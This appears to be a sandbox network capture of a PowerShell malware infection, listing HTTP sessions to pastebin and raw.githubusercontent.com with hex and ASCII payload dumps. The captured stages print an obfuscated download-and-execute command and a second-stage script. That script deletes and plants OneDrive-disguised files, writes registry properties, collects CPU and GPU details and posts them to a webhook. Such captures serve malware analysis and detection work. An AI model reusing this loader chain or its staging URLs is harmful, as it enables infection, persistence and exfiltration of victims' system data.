                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.6 | 49938 | 185.199.109.133 | 80 | 3780 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Oct 15, 2024 16:00:33.499825001 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:34.105288029 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:34 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdfw8210102-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000834.043754,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:05:34 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.6 | 49733 | 104.20.4.235 | 443 | 2992 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 13:59:58 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 13:59:58 UTC | 397 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 13:59:58 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 448
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d305530efb24786-DFW
                                                            2024-10-15 13:59:58 UTC | 139 | IN | Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 13:59:58 UTC | 5 | IN | Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.6 | 49735 | 104.20.4.235 | 443 | 2536 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 13:59:58 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 13:59:58 UTC | 397 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 13:59:58 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 448
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d305530faa9462a-DFW
                                                            2024-10-15 13:59:58 UTC | 139 | IN | Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 13:59:58 UTC | 5 | IN | Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.6 | 49734 | 104.20.4.235 | 443 | 4040 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 13:59:59 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 13:59:59 UTC | 397 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 13:59:59 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 449
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d305533eda14779-DFW
                                                            2024-10-15 13:59:59 UTC | 139 | IN | Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 13:59:59 UTC | 5 | IN | Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.6 | 49748 | 185.199.109.133 | 443 | 2992 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 14:00:00 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:00 UTC | 900 | IN | HTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:00 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120062-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729000801.583606,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: e6fafa10bb1fd93888029846b6dcda73080275eb
                                                            Expires: Tue, 15 Oct 2024 14:05:00 GMT
                                                            Source-Age: 6
                                                            2024-10-15 14:00:00 UTC | 1378 | IN | Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 14:00:00 UTC | 1378 | IN | Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 14:00:00 UTC | 1378 | IN | Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 14:00:00 UTC | 1378 | IN | Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 14:00:00 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49749 | 185.199.109.133 | 443 | 2536 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:00 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-10-15 14:00:00 UTC | 900 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 7508
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
    Accept-Ranges: bytes
    Date: Tue, 15 Oct 2024 14:00:00 GMT
    Via: 1.1 varnish
    X-Served-By: cache-dfw-kdal2120030-DFW
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1729000801.588459,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: c036b1916e7127687d7a12ef406e73b9d4f2866b
    Expires: Tue, 15 Oct 2024 14:05:00 GMT
    Source-Age: 6
2024-10-15 14:00:00 UTC | 1378 | IN | Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
    Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
2024-10-15 14:00:00 UTC | 1378 | IN | Data Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
    Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
2024-10-15 14:00:00 UTC | 1378 | IN | Data Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
    Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
2024-10-15 14:00:00 UTC | 1378 | IN | Data Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
    Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
2024-10-15 14:00:00 UTC | 1378 | IN | Data Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
    Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
2024-10-15 14:00:00 UTC | 618 | IN | Data Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
    Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49750 | 104.20.4.235 | 443 | 1396 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:00 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: pastebin.com
    Connection: Keep-Alive
2024-10-15 14:00:00 UTC | 397 | IN | HTTP/1.1 200 OK
    Date: Tue, 15 Oct 2024 14:00:00 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: HIT
    Age: 450
    Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
    Server: cloudflare
    CF-RAY: 8d30553bfba7e583-DFW
2024-10-15 14:00:00 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
    Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 14:00:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49751 | 185.199.109.133 | 443 | 4040 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:00 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-10-15 14:00:00 UTC | 900 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 7508
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
    Accept-Ranges: bytes
    Date: Tue, 15 Oct 2024 14:00:00 GMT
    Via: 1.1 varnish
    X-Served-By: cache-dfw-kdfw8210028-DFW
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1729000801.737276,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 6d960304796e585a4c9bc104498d922236ccb622
    Expires: Tue, 15 Oct 2024 14:05:00 GMT
    Source-Age: 6
2024-10-15 14:00:00 UTC | 1378 | IN | Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
    Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
